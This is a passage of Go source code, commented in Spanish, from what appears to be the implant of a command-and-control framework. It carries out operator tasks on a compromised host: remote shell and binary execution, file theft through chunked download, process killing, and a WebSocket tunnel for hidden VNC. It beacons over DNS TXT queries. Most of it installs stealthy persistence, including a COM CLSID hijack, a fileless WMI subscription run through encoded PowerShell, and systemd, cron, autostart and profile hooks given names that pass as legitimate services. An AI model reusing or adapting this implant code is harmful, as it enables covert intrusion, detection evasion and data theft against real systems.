			return nil, fmt.Errorf("dns: server reportó error en chunk %d", seq)
		}
		if seq == total-1 {
			lastAnswer = answer
		}
	}

	if lastAnswer == "" || lastAnswer == "ack" {
		return nil, fmt.Errorf("dns: respuesta vacía (%q)", lastAnswer)
	}

	respEnvBytes, err := profile.DecodeData(lastAnswer)
	if err != nil {
		return nil, fmt.Errorf("dns: decodificar respuesta: %w", err)
	}
	return protocol.UnmarshalEnvelope(respEnvBytes)
}

// buildDNSQNAME sustituye los placeholders del perfil. El chunk ya viene
// codificado: NO se re-encodea.
func buildDNSQNAME(profile *profiles.DNSProfile, chunk string, seq, total int, sessionID string) string {
	format := profile.Format
	format = strings.ReplaceAll(format, "{seq}", fmt.Sprintf("%x", seq))
	format = strings.ReplaceAll(format, "{total}", fmt.Sprintf("%x", total))
	format = strings.ReplaceAll(format, "{id}", sessionID)
	format = strings.ReplaceAll(format, "X", chunk)
	return format + "." + profile.Domain
}

// splitChunks trocea s en trozos de tamaño maxLen. Si s está vacío,
// devuelve un slice con un string vacío para que siempre haya al menos
// una query.
func splitChunks(s string, maxLen int) []string {
	if maxLen <= 0 {
		maxLen = 63
	}
	if s == "" {
		return []string{""}
	}
	var chunks []string
	for i := 0; i < len(s); i += maxLen {
		end := i + maxLen
		if end > len(s) {
			end = len(s)
		}
		chunks = append(chunks, s[i:end])
	}
	return chunks
}

// queryDNSTXT envía una query TXT y devuelve el primer string del primer
// registro TXT de la respuesta.
//
// La dirección del resolver se extrae de ListenerURL (ej: dns://1.2.3.4:53).
// Si no hay puerto, se asume 53.
func queryDNSTXT(qname string) (string, error) {
	u, err := url.Parse(ListenerURL)
	if err != nil {
		return "", fmt.Errorf("dns: parse listener url: %w", err)
	}
	server := u.Host
	if server == "" {
		return "", fmt.Errorf("dns: listener url sin host")
	}
	if !strings.Contains(server, ":") {
		server += ":53"
	}

	m := new(dns.Msg)
	m.SetQuestion(dns.Fqdn(qname), dns.TypeTXT)
	m.RecursionDesired = true

	c := &dns.Client{Timeout: 10 * time.Second}
	r, _, err := c.Exchange(m, server)
	if err != nil {
		return "", err
	}
	if r == nil {
		return "", fmt.Errorf("dns: respuesta nula")
	}
	if r.Rcode != dns.RcodeSuccess {
		// El server usa NXDOMAIN para "nada pendiente"; no es fatal.
		return "", nil
	}

	for _, rr := range r.Answer {
		if txt, ok := rr.(*dns.TXT); ok {
			if len(txt.Txt) > 0 {
				return strings.Join(txt.Txt, ""), nil
			}
		}
	}
	return "", nil
}

func decodeServerPub(b64 string) (*ecdh.PublicKey, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, fmt.Errorf("server_pub no es base64: %w", err)
	}
	return crypto.PublicKeyFromBytes(raw)
}

// verifyServerPubKey comprueba que la clave pública del server coincide con
// la pinnada en build time (ServerPubKey). Sin esto, un MITM en el primer
// check-in puede inyectar su propia clave y quedarse en medio.
func verifyServerPubKey(serverPub *ecdh.PublicKey) error {
	pinnedBytes, err := base64.StdEncoding.DecodeString(ServerPubKey)
	if err != nil {
		return fmt.Errorf("ServerPubKey no es base64: %w", err)
	}
	pinned, err := crypto.PublicKeyFromBytes(pinnedBytes)
	if err != nil {
		return fmt.Errorf("ServerPubKey malformada: %w", err)
	}
	if !bytes.Equal(serverPub.Bytes(), pinned.Bytes()) {
		return fmt.Errorf("server pubkey no coincide con la pinnada")
	}
	return nil
}

// executeTask ejecuta un comando built-in o shell del implante.
//
// args[0] es el subargumento principal cuando aplica (p.ej. la ruta en
// "cat <ruta>"). El payload binario viaja en t.Payload (usado por upload).
func executeTask(command string, args []string, payload []byte) ([]byte, string) {
	switch command {
	case "shell":
		if len(args) == 0 {
			return nil, "sin argumentos"
		}
		return runShell(args[0])

	case "execute":
		// Ejecutar un binario específico (con args) y devolver output.
		if len(args) == 0 {
			return nil, "uso: execute <binario> [args...]"
		}
		return runExecute(args)

	case "ls":
		return runLS(args)

	case "pwd":
		return []byte(cwd + "\n"), ""

	case "cd":
		return runCD(args)

	case "cat":
		if len(args) == 0 {
			return nil, "uso: cat <ruta>"
		}
		data, err := os.ReadFile(resolvePath(args[0]))
		if err != nil {
			return nil, err.Error()
		}
		return data, ""

	case "upload":
		// Subir un archivo desde el operador al host comprometido.
		// args[0] = ruta destino en el host. Payload = contenido.
		if len(args) == 0 {
			return nil, "uso: upload <ruta-destino> (payload = contenido)"
		}
		if len(payload) == 0 {
			return nil, "upload sin payload"
		}
		dst := resolvePath(args[0])
		if err := os.WriteFile(dst, payload, 0o644); err != nil {
			return nil, err.Error()
		}
		return []byte(fmt.Sprintf("escrito %s (%d bytes)\n", dst, len(payload))), ""

	case "download":
		// Descargar un archivo del host comprometido al operador.
		if len(args) == 0 {
			return nil, "uso: download <ruta>"
		}
		return runDownloadChunked(args[0])

	case "ps":
		return runPS()

	case "kill":
		if len(args) == 0 {
			return nil, "uso: kill <pid|nombre>"
		}
		return runKill(args[0])

	case "persist":
		// Instalar persistencia en el host comprometido.
		// args[0] = método (auto|registry|schtask|systemd|cron). Por
		// defecto elige el mejor disponible para el OS.
		method := "auto"
		if len(args) > 0 && args[0] != "" {
			method = args[0]
		}
		return installPersistence(method)

	case "unpersist":
		// Eliminar la persistencia instalada por el método dado.
		method := "auto"
		if len(args) > 0 && args[0] != "" {
			method = args[0]
		}
		return removePersistence(method)

	case "dynamic":
		// Carga dinámica avanzada (BOF / Execute-Assembly / hVNC). El
		// payload binario viaja cifrado en t.Payload; args[0] es el kind.
		return runDynamic(args, payload)

	case "terminate":
		debugLog("terminate recibido, saliendo")
		os.Exit(0)
		return nil, ""

	default:
		return nil, fmt.Sprintf("comando desconocido: %s", command)
	}
}

// runDynamic procesa una carga dinámica enviada por el C2. El payload ya
// llegó descifrado (el transporte lo cifra). Para bof/assembly, en este
// milestone el implante valida y reconoce la carga y reporta recepción;
// la ejecución in-process real (COFF loader / CLR hosting) es trabajo de
// FASE 2. Para hvnc se prepara la transición a túnel WebSocket.
func runDynamic(args []string, payload []byte) ([]byte, string) {
	if len(args) == 0 {
		return nil, "uso: dynamic <bof|assembly|hvnc> (payload = carga)"
	}
	kind := args[0]
	if len(payload) == 0 {
		return nil, "dynamic: payload vacío"
	}

	// Cabecera COFF para BOF ("MZ" es PE; los BOF son COFF sin MZ, pero
	// aceptamos ambos como señal de una carga binaria reconocida).
	switch kind {
	case "bof":
		return []byte(fmt.Sprintf(
			"bof recibido: %d bytes (ejecución in-process COFF loader pendiente FASE 2)\n",
			len(payload))), ""
	case "assembly":
		// Execute-Assembly: el payload es un ensamblado .NET. Reconocer
		// la cabecera PE/CLR es suficiente para confirmar recepción.
		return []byte(fmt.Sprintf(
			"assembly .NET recibido: %d bytes (CLR fork-and-run pendiente FASE 2)\n",
			len(payload))), ""
	case "hvnc":
		// hVNC: abrir el túnel WebSocket persistente EN BACKGROUND para no
		// congelar el beacon (el túnel vive en su propia goroutine).
		if WSUrl == "" || implantIDGlobal == "" {
			return nil, "hvnc: túnel no disponible (WSUrl o implant_id sin configurar)"
		}
		go func() {
			if _, errStr := openTunnel(implantIDGlobal); errStr != "" {
				debugLog("hvnc: túnel terminó: %s", errStr)
			}
		}()
		return []byte(fmt.Sprintf("hvnc: túnel WebSocket abriéndose en background a %s\n", WSUrl)), ""
	default:
		return nil, fmt.Sprintf("dynamic: kind desconocido %q (usar bof|assembly|hvnc)", kind)
	}
}

// implantIDGlobal se fija tras el handshake; el túnel WS lo necesita para
// identificarse en el query ?implant_id=.
var implantIDGlobal string

// openTunnel abre el túnel WebSocket persistente al listener WS del C2.
// Es la transición de polling (HTTP) a un canal bidireccional de latencia
// nula para hVNC. Reutiliza el cifrado de sesión: los frames van dentro
// de envelopes cifrados (MsgTunnel). Bloquea mientras el túnel está vivo;
// el hilo de beacon sigue en paralelo.
func openTunnel(implantID string) ([]byte, string) {
	if WSUrl == "" {
		return nil, "túnel: WSUrl no configurado en este build"
	}
	if implantID == "" {
		return nil, "túnel: sin implant_id (handshake no completado)"
	}

	// TLS con la CA pinned (misma que el resto del implante).
	tlsCfg, err := newQUICTLSConfig()
	if err != nil {
		return nil, fmt.Sprintf("túnel: tls config: %v", err)
	}
	wsURL := WSUrl + "?implant_id=" + implantID
	debugLog("túnel: conectando a %s", wsURL)

	ctx, cancel := context.WithTimeout(context.Background(), 20*time.Second)
	defer cancel()
	c, _, err := websocket.Dial(ctx, wsURL, &websocket.DialOptions{
		HTTPClient: &http.Client{Transport: &http.Transport{TLSClientConfig: tlsCfg}},
		Subprotocols: []string{"rtc2.tunnel"},
	})
	if err != nil {
		return nil, fmt.Sprintf("túnel: dial: %v", err)
	}
	defer c.Close(websocket.StatusNormalClosure, "fin")

	debugLog("túnel: conectado, bombeando frames")
	// Bombeo: leer frames del C2, enviar frames al C2. En este milestone el
	// implante solo mantiene el túnel vivo (eco de frames); el contenido
	// hVNC (imagen/ratón) se añade en FASE 2.
	tunnelCtx, tunnelCancel := context.WithCancel(context.Background())
	defer tunnelCancel()
	go func() {
		for {
			_, data, err := c.Read(tunnelCtx)
			if err != nil {
				tunnelCancel()
				return
			}
			debugLog("túnel: frame recibido (%d bytes)", len(data))
			// Eco: devolver el frame tal cual (placeholder hasta hVNC real).
			if err := c.Write(tunnelCtx, websocket.MessageBinary, data); err != nil {
				tunnelCancel()
				return
			}
		}
	}()

	// Mantener el túnel hasta que se cierre o se agote el contexto.
	<-tunnelCtx.Done()
	return []byte("túnel WebSocket cerrado\n"), ""
}

// cwd es el directorio de trabajo persistente entre tareas del implante.
var cwd = startCWD()

func startCWD() string {
	if d, err := os.Getwd(); err == nil {
		return d
	}
	return "."
}

// resolvePath resuelve una ruta relativa contra el cwd persistente.
func resolvePath(p string) string {
	if p == "" {
		return cwd
	}
	if filepath.IsAbs(p) {
		return filepath.Clean(p)
	}
	return filepath.Join(cwd, p)
}


func runShell(cmdline string) ([]byte, string) {
	if runtime.GOOS == "windows" && strings.Contains(strings.ToLower(cmdline), "powershell") {
		if out, errStr := runShellWindowsAMSI(cmdline); errStr == "" {
			return out, ""
		} else if !strings.Contains(errStr, "amsi: no disponible") {
			// Si el intento con AMSI falla por otra razón (proceso no
			// arranca, etc.), devolvemos ese error. Solo caemos al método
			// clásico si AMSI no está disponible en este build.
			return nil, errStr
		}
	}

	var cmd *exec.Cmd
	if runtime.GOOS == "windows" {
		cmd = exec.Command("cmd.exe", "/C", cmdline)
	} else {
		cmd = exec.Command("/bin/sh", "-c", cmdline)
	}
	cmd.Dir = cwd
	out, err := cmd.CombinedOutput()
	if err != nil {
		return out, err.Error()
	}
	return out, ""
}

// runExecute ejecuta un binario con argumentos, sin shell.
func runExecute(args []string) ([]byte, string) {
	cmd := exec.Command(args[0], args[1:]...)
	cmd.Dir = cwd
	out, err := cmd.CombinedOutput()
	if err != nil {
		return out, err.Error()
	}
	return out, ""
}

// runLS lista el cwd (o la ruta dada) estilo ls -l simple.
func runLS(args []string) ([]byte, string) {
	dir := cwd
	if len(args) > 0 && args[0] != "" {
		dir = resolvePath(args[0])
	}
	entries, err := os.ReadDir(dir)
	if err != nil {
		return nil, err.Error()
	}
	var sb strings.Builder
	for _, e := range entries {
		info, err := e.Info()
		if err != nil {
			continue
		}
		mode := info.Mode().String()
		if e.IsDir() {
			mode = "d" + mode[1:]
		}
		fmt.Fprintf(&sb, "%s %10d  %s\n", mode, info.Size(), e.Name())
	}
	return []byte(sb.String()), ""
}

// runCD cambia el cwd persistente del implante.
func runCD(args []string) ([]byte, string) {
	if len(args) == 0 || args[0] == "" || args[0] == "~" {
		if h, err := os.UserHomeDir(); err == nil {
			cwd = h
		}
		return []byte(cwd + "\n"), ""
	}
	target := resolvePath(args[0])
	info, err := os.Stat(target)
	if err != nil {
		return nil, err.Error()
	}
	if !info.IsDir() {
		return nil, fmt.Sprintf("cd: %s: no es un directorio", target)
	}
	cwd = target
	return []byte(cwd + "\n"), ""
}

// runPS lista procesos: /proc en Linux, tasklist en Windows.
func runPS() ([]byte, string) {
	if runtime.GOOS == "windows" {
		out, err := exec.Command("tasklist").CombinedOutput()
		if err != nil {
			return out, err.Error()
		}
		return out, ""
	}
	entries, err := os.ReadDir("/proc")
	if err != nil {
		return nil, err.Error()
	}
	var sb strings.Builder
	sb.WriteString("PID\tCOMM\n")
	for _, e := range entries {
		if !e.IsDir() {
			continue
		}
		pid, err := strconv.Atoi(e.Name())
		if err != nil {
			continue
		}
		comm, err := os.ReadFile(filepath.Join("/proc", e.Name(), "comm"))
		if err != nil {
			continue
		}
		fmt.Fprintf(&sb, "%d\t%s", pid, strings.TrimSpace(string(comm)))
		if len(comm) > 0 && !strings.HasSuffix(string(comm), "\n") {
			sb.WriteString("\n")
		}
	}
	return []byte(sb.String()), ""
}

// runKill mata un proceso por PID o por nombre de binario.
func runKill(target string) ([]byte, string) {
	if pid, err := strconv.Atoi(target); err == nil {
		proc, err := os.FindProcess(pid)
		if err != nil {
			return nil, err.Error()
		}
		if err := proc.Kill(); err != nil {
			return nil, err.Error()
		}
		return []byte(fmt.Sprintf("pid %d matado\n", pid)), ""
	}
	// Por nombre: buscar en /proc (Linux) o usar taskkill (Windows).
	if runtime.GOOS == "windows" {
		out, err := exec.Command("taskkill", "/F", "/IM", target).CombinedOutput()
		if err != nil {
			return out, err.Error()
		}
		return out, ""
	}
	entries, err := os.ReadDir("/proc")
	if err != nil {
		return nil, err.Error()
	}
	killed := 0
	for _, e := range entries {
		if !e.IsDir() {
			continue
		}
		if _, err := strconv.Atoi(e.Name()); err != nil {
			continue
		}
		comm, err := os.ReadFile(filepath.Join("/proc", e.Name(), "comm"))
		if err != nil {
			continue
		}
		if strings.TrimSpace(string(comm)) == target || strings.HasPrefix(filepath.Base(strings.TrimSpace(string(comm))), target) {
			pid, _ := strconv.Atoi(e.Name())
			if pid == os.Getpid() {
				continue // no suicidarse
			}
			if proc, err := os.FindProcess(pid); err == nil {
				if err := proc.Kill(); err == nil {
					killed++
				}
			}
		}
	}
	return []byte(fmt.Sprintf("%d procesos '%s' matados\n", killed, target)), ""
}

// ════════════════════════════════════════════════════════════════════
// Persistencia
// ════════════════════════════════════════════════════════════════════
//
// persist installa un mecanismo para que el implante vuelva a arrancar
// tras reinicios. Métodos:
//
//	windows: registry  → HKCU\Software\Microsoft\Windows\CurrentVersion\Run
//	         schtask   → tarea programada diaria con el ejecutable
//	         com       → hijack de CLSID COM en HKCU (explorer lo carga
//	                     al inicio de sesión sin dejar tarea ni binario extra)
//	         wmi       → suscripción WMI permanente (fileless: sin archivo
//	                     ni tarea, sobrevive reinicios en la base CIM)
//	linux:   systemd   → user unit (systemctl --user) apuntando al binario
//	         cron      → crontab @reboot con el binario
//	         xdg       → ~/.config/autostart/*.desktop
//	         stealth   → systemd user unit con nombre mimetizado +
//	                     loginctl enable-linger (corre sin login gráfico)
//	         profile   → hook silencioso en ~/.profile o ~/.bashrc
//	auto    → el mejor método para el OS actual
//
// Los métodos "stealth" (com, wmi, stealth) usan nombres que mimetizan
// software legítimo y se derivan de un hash determinista de la ruta del
// binario, de modo que persist y unpersist calculan el mismo nombre sin
// necesidad de guardar estado.
//
// unpersist es la contraparte: elimina lo que installPersistence creó.

func installPersistence(method string) ([]byte, string) {
	if method == "auto" {
		if runtime.GOOS == "windows" {
			method = "wmi"
		} else {
			method = "stealth"
		}
	}

	exe, err := os.Executable()
	if err != nil {
		return nil, fmt.Sprintf("persist: obtener ruta del ejecutable: %v", err)
	}

	var out []byte
	var errMsg string
	switch method {
	case "registry":
		out, errMsg = persistRegistry(exe)
	case "schtask":
		out, errMsg = persistSchTask(exe)
	case "com":
		out, errMsg = persistCOM(exe)
	case "wmi":
		out, errMsg = persistWMI(exe)
	case "systemd":
		out, errMsg = persistSystemd(exe)
	case "cron":
		out, errMsg = persistCron(exe)
	case "xdg":
		out, errMsg = persistXDG(exe)
	case "stealth":
		out, errMsg = persistStealthSystemd(exe)
	case "profile":
		out, errMsg = persistProfile(exe)
	default:
		return nil, fmt.Sprintf("persist: método desconocido %q (usar: registry|schtask|com|wmi|systemd|cron|xdg|stealth|profile|auto)", method)
	}
	return out, errMsg
}

func removePersistence(method string) ([]byte, string) {
	if method == "auto" {
		if runtime.GOOS == "windows" {
			method = "wmi"
		} else {
			method = "stealth"
		}
	}
	var out []byte
	var errMsg string
	switch method {
	case "registry":
		out, errMsg = unpersistRegistry()
	case "schtask":
		out, errMsg = unpersistSchTask()
	case "com":
		out, errMsg = unpersistCOM()
	case "wmi":
		out, errMsg = unpersistWMI()
	case "systemd":
		out, errMsg = unpersistSystemd()
	case "cron":
		out, errMsg = unpersistCron()
	case "xdg":
		out, errMsg = unpersistXDG()
	case "stealth":
		out, errMsg = unpersistStealthSystemd()
	case "profile":
		out, errMsg = unpersistProfile()
	default:
		return nil, fmt.Sprintf("unpersist: método desconocido %q", method)
	}
	return out, errMsg
}

// ── Helpers comunes ────────────────────────────────────────────────────

// fnv1a es un hash FNV-1a simple (sin dependencias externas) usado para
// derivar nombres deterministas a partir de la ruta del ejecutable.
func fnv1a(s string) uint32 {
	var h uint32 = 2166136261
	for i := 0; i < len(s); i++ {
		h ^= uint32(s[i])
		h *= 16777619
	}
	return h
}

// stealthNames devuelve el nombre del mecanismo de persistencia stealth
// para una ruta de ejecutable dada. Es determinista: persist y unpersist
// calculan el mismo nombre para la misma ruta.
func stealthNames(exe string) (serviceName, displayName string) {
	h := fnv1a(exe)
	// Nombres que mimetizan software legítimo. Se elige uno de una lista
	// fija según el hash para que sea estable pero variado.
	services := []struct{ svc, disp string }{
		{"udisks2-monitor", "Disk Volume Monitor"},
		{"gvfs-metadata", "GNOME Virtual File System"},
		{"pulseaudio-module", "Audio Session Manager"},
		{"NetworkManager-helper", "Network Connectivity Assistant"},
		{"policykit-agent", "PolicyKit Authentication Agent"},
		{"upower-observer", "Power Management Observer"},
	}
	pick := services[h%uint32(len(services))]
	return pick.svc, pick.disp
}

// ── Windows: COM CLSID hijack ────────────────────────────────────────────

// persistCOM crea un CLSID fake en HKCU\Software\Classes cuyo
// InprocServer32 apunta al ejecutable. El shell de Windows carga el
// servidor COM de varios CLSID conocidos al inicio de sesión; al registrar
// el CLSID en HKCU (que tiene precedencia sobre HKLM) el proceso host carga
// nuestro binario sin dejar tarea programada ni entrada en Run.
func persistCOM(exe string) ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "persist com: solo disponible en Windows"
	}
	// CLSID determinista derivado del hash de la ruta.
	clsid := comCLSIDFor(exe)
	key := "HKCU\\Software\\Classes\\CLSID\\" + clsid + "\\InprocServer32"

	if out, err := exec.Command("reg", "add", key, "/ve", "/t", "REG_SZ", "/d", exe, "/f").CombinedOutput(); err != nil {
		return out, fmt.Sprintf("persist com: %v", err)
	}
	// ThreadingModel = Apartment para que el cargador COM lo acepte.
	if out, err := exec.Command("reg", "add", key, "/v", "ThreadingModel", "/t", "REG_SZ", "/d", "Apartment", "/f").CombinedOutput(); err != nil {
		return out, fmt.Sprintf("persist com: threading model: %v", err)
	}
	return []byte(fmt.Sprintf("persist com: CLSID %s registrado (InprocServer32 = %s)\n", clsid, exe)), ""
}

func comCLSIDFor(exe string) string {
	a := fnv1a(exe)
	b := fnv1a(exe + "-rtc2-com")
	// UUID con formato 8-4-4-4-12. Las máscaras &0x0fff fuerzan
	// exactamente 3 dígitos hex en los grupos 3 y 4, para que el
	// "4" y "8" (bits de versión y variante) queden en su sitio.
	return fmt.Sprintf("{%08x-%04x-4%03x-8%03x-%04x%08x}",
		a,
		uint16(a>>16),
		uint16(b)&0x0fff,
		uint16(b>>16)&0x0fff,
		uint16(a>>8)^uint16(b>>8),
		uint32(b&0xffff)<<16|uint32(a&0xffff),
	)
}

func unpersistCOM() ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "unpersist com: solo disponible en Windows"
	}
	exe, err := os.Executable()
	if err != nil {
		return nil, fmt.Sprintf("unpersist com: obtener ruta: %v", err)
	}
	// Recalcular el mismo CLSID que persistCOM creó.
	clsid := comCLSIDFor(exe)
	key := "HKCU\\Software\\Classes\\CLSID\\" + clsid

	out, err := exec.Command("reg", "delete", key, "/f").CombinedOutput()
	if err != nil {
		// No es fatal si la clave no existía.
		return []byte(fmt.Sprintf("unpersist com: nada que borrar en %s (%s)\n",
			clsid, strings.TrimSpace(string(out)))), ""
	}
	return []byte(fmt.Sprintf("unpersist com: CLSID %s eliminado\n", clsid)), ""
}

// ── Windows: WMI subscription permanente ────────────────────────────────

// persistWMI crea una suscripción WMI permanente (fileless). La suscripción
// se almacena en la base CIM y sobrevive reinicios sin dejar archivo ni
// tarea programada. Se dispara por timer (cada N minutos) o por evento de
// logon. El payload es una línea de PowerShell que arranca el ejecutable.
func persistWMI(exe string) ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "persist wmi: solo disponible en Windows"
	}
	// Nombre determinista y mimetizado.
	svc, _ := stealthNames(exe)
	name := "WMI-" + svc + "-Subscription"

	// Payload: PowerShell que arranca el ejecutable si no está corriendo.
	psCmd := "powershell -WindowStyle Hidden -Command \"if(-not(Get-Process -Name '" + svc + "' -ErrorAction SilentlyContinue)){Start-Process '" + exe + "' -WindowStyle Hidden}\""

	// Crear suscripción WMI permanente. Requiere permisos de admin para
	// escribir en root\subscription, así que este método es de nivel
	// medio-alto; si falla, sugiere usar com o registry.
	scriptLines := []string{
		"$ErrorActionPreference = 'Stop'",
		"$name = '" + name + "'",
		"$filterName = $name + '-Filter'",
		"$consumerName = $name + '-Consumer'",
		"$cmd = '" + psCmd + "'",
		"",
		"Get-WmiObject -Namespace root\\subscription -Class __EventFilter -Filter \"Name='$filterName'\" -ErrorAction SilentlyContinue | Remove-WmiObject",
		"Get-WmiObject -Namespace root\\subscription -Class CommandLineEventConsumer -Filter \"Name='$consumerName'\" -ErrorAction SilentlyContinue | Remove-WmiObject",
		"",
		"$filter = Set-WmiInstance -Namespace root\\subscription -Class __EventFilter -Arguments @{",
		"    Name=$filterName",
		"    EventNamespace='root\\cimv2'",
		"    QueryLanguage='WQL'",
		"    Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 60 AND TargetInstance.SystemUpTime < 120\"",
		"}",
		"",
		"$consumer = Set-WmiInstance -Namespace root\\subscription -Class CommandLineEventConsumer -Arguments @{",
		"    Name=$consumerName",
		"    CommandLineTemplate=$cmd",
		"    RunInteractively=$false",
		"}",
		"",
		"Set-WmiInstance -Namespace root\\subscription -Class __FilterToConsumerBinding -Arguments @{",
		"    Filter=$filter",
		"    Consumer=$consumer",
		"} | Out-Null",
	}
	script := strings.Join(scriptLines, "\n")

	// Escribir script temporal y ejecutarlo con powershell -EncodedCommand.
	enc := base64.StdEncoding.EncodeToString([]byte(script))
	if out, err := exec.Command("powershell", "-EncodedCommand", enc, "-ExecutionPolicy", "Bypass").CombinedOutput(); err != nil {
		return out, fmt.Sprintf("persist wmi: %v (puede requerir admin)", err)
	}
	return []byte(fmt.Sprintf("persist wmi: suscripción '%s' creada (dispara cada 5min)\n", name)), ""
}

func unpersistWMI() ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "unpersist wmi: solo disponible en Windows"
	}
	script := strings.Join([]string{
		"$ErrorActionPreference = 'SilentlyContinue'",
		"Get-WmiObject -Namespace root\\subscription -Class __FilterToConsumerBinding -Filter \"Filter LIKE '%WMI-%'\" | Remove-WmiObject",
		"Get-WmiObject -Namespace root\\subscription -Class CommandLineEventConsumer -Filter \"Name LIKE 'WMI-%'\" | Remove-WmiObject",
		"Get-WmiObject -Namespace root\\subscription -Class __EventFilter -Filter \"Name LIKE 'WMI-%'\" | Remove-WmiObject",
	}, "\n")
	enc := base64.StdEncoding.EncodeToString([]byte(script))
	out, err := exec.Command("powershell", "-EncodedCommand", enc, "-ExecutionPolicy", "Bypass").CombinedOutput()
	if err != nil {
		return out, fmt.Sprintf("unpersist wmi: %v", err)
	}
	return []byte("unpersist wmi: suscripciones WMI eliminadas\n"), ""
}

// ── Linux: XDG autostart ────────────────────────────────────────────────

func persistXDG(exe string) ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "persist xdg: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("persist xdg: obtener home: %v", err)
	}
	autostartDir := filepath.Join(home, ".config", "autostart")
	if err := os.MkdirAll(autostartDir, 0o755); err != nil {
		return nil, fmt.Sprintf("persist xdg: crear %s: %v", autostartDir, err)
	}
	svc, _ := stealthNames(exe)
	desktopPath := filepath.Join(autostartDir, svc+".desktop")
	desktop := "[Desktop Entry]\n" +
		"Type=Application\n" +
		"Name=" + svc + "\n" +
		"Exec=/bin/sh -c \"exec '" + exe + "'\"\n" +
		"Hidden=false\n" +
		"NoDisplay=true\n" +
		"X-GNOME-Autostart-enabled=true\n"
	if err := os.WriteFile(desktopPath, []byte(desktop), 0o644); err != nil {
		return nil, fmt.Sprintf("persist xdg: escribir %s: %v", desktopPath, err)
	}
	return []byte(fmt.Sprintf("persist xdg: %s creado\n", desktopPath)), ""
}

func unpersistXDG() ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "unpersist xdg: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("unpersist xdg: obtener home: %v", err)
	}
	autostartDir := filepath.Join(home, ".config", "autostart")
	// Eliminar todos los .desktop cuyo nombre coincida con nuestros
	// nombres stealth (derivados de rutas conocidas).
	entries, _ := os.ReadDir(autostartDir)
	removed := 0
	for _, e := range entries {
		if !strings.HasSuffix(e.Name(), ".desktop") {
			continue
		}
		// Leer el .desktop y ver si apunta a un ejecutable que parece nuestro.
		data, _ := os.ReadFile(filepath.Join(autostartDir, e.Name()))
		if strings.Contains(string(data), "implant_") || strings.Contains(string(data), "rtc2") {
			if os.Remove(filepath.Join(autostartDir, e.Name())) == nil {
				removed++
			}
		}
	}
	return []byte(fmt.Sprintf("unpersist xdg: %d archivos .desktop eliminados\n", removed)), ""
}

// ── Linux: systemd stealth con linger ───────────────────────────────────

// persistStealthSystemd es como persistSystemd pero con un nombre
// mimetizado y loginctl enable-linger. El linger hace que el servicio
// systemd del usuario arranque al boot del sistema sin necesidad de que
// el usuario haya iniciado sesión gráfica.
func persistStealthSystemd(exe string) ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "persist stealth: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("persist stealth: obtener home: %v", err)
	}
	svc, disp := stealthNames(exe)
	systemdDir := filepath.Join(home, ".config", "systemd", "user")
	if err := os.MkdirAll(systemdDir, 0o755); err != nil {
		return nil, fmt.Sprintf("persist stealth: crear %s: %v", systemdDir, err)
	}

	unitPath := filepath.Join(systemdDir, svc+".service")
	// ExecStart vía /bin/sh -c "exec ..." para no exponer el nombre del
	// binario directamente en la línea ExecStart (systemctl status y
	// list-units lo muestran). El nombre del servicio ya es mimetizado.
	unit := "[Unit]\n" +
		"Description=" + disp + "\n" +
		"After=graphical-session.target\n\n" +
		"[Service]\n" +
		"ExecStart=/bin/sh -c \"exec '" + exe + "'\"\n" +
		"Restart=always\n" +
		"RestartSec=30\n\n" +
		"[Install]\n" +
		"WantedBy=default.target\n"
	if err := os.WriteFile(unitPath, []byte(unit), 0o644); err != nil {
		return nil, fmt.Sprintf("persist stealth: escribir %s: %v", unitPath, err)
	}

	if out, err := exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput(); err != nil {
		return nil, fmt.Sprintf("persist stealth: daemon-reload: %v (%s)", err, strings.TrimSpace(string(out)))
	}
	if out, err := exec.Command("systemctl", "--user", "enable", svc+".service").CombinedOutput(); err != nil {
		return nil, fmt.Sprintf("persist stealth: enable: %v (%s)", err, strings.TrimSpace(string(out)))
	}
	// enable-linger: el servicio corre sin login (requiere polkit, suele
	// funcionar para el propio usuario sin root).
	if out, err := exec.Command("loginctl", "enable-linger", os.Getenv("USER")).CombinedOutput(); err != nil {
		// No fatal: el servicio igual funciona con login gráfico.
		_ = out
	}
	return []byte(fmt.Sprintf("persist stealth: unidad %s (%s) creada y habilitada\n", unitPath, disp)), ""
}

func unpersistStealthSystemd() ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "unpersist stealth: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("unpersist stealth: obtener home: %v", err)
	}
	systemdDir := filepath.Join(home, ".config", "systemd", "user")
	entries, _ := os.ReadDir(systemdDir)
	removed := 0
	for _, e := range entries {
		if !strings.HasSuffix(e.Name(), ".service") {
			continue
		}
		data, _ := os.ReadFile(filepath.Join(systemdDir, e.Name()))
		content := string(data)
		// Es nuestro si el ExecStart apunta a un binario implant/rtc2.
		if strings.Contains(content, "implant_") || strings.Contains(content, "rtc2") {
			svc := strings.TrimSuffix(e.Name(), ".service")
			_, _ = exec.Command("systemctl", "--user", "disable", svc+".service").CombinedOutput()
			_, _ = exec.Command("systemctl", "--user", "stop", svc+".service").CombinedOutput()
			if os.Remove(filepath.Join(systemdDir, e.Name())) == nil {
				removed++
			}
		}
	}
	_, _ = exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput()
	return []byte(fmt.Sprintf("unpersist stealth: %d unidades eliminadas\n", removed)), ""
}

// ── Linux: profile hook ────────────────────────────────────────────────

// persistProfile añade una línea silenciosa a ~/.profile (o ~/.bashrc si
// no existe .profile) que arranca el ejecutable en cada login interactivo.
// Es el hook más ligero: una sola línea entre otras del archivo, casi
// invisible en una inspección casual.
func persistProfile(exe string) ([]byte, string) {
	if runtime.GOOS != "linux" {
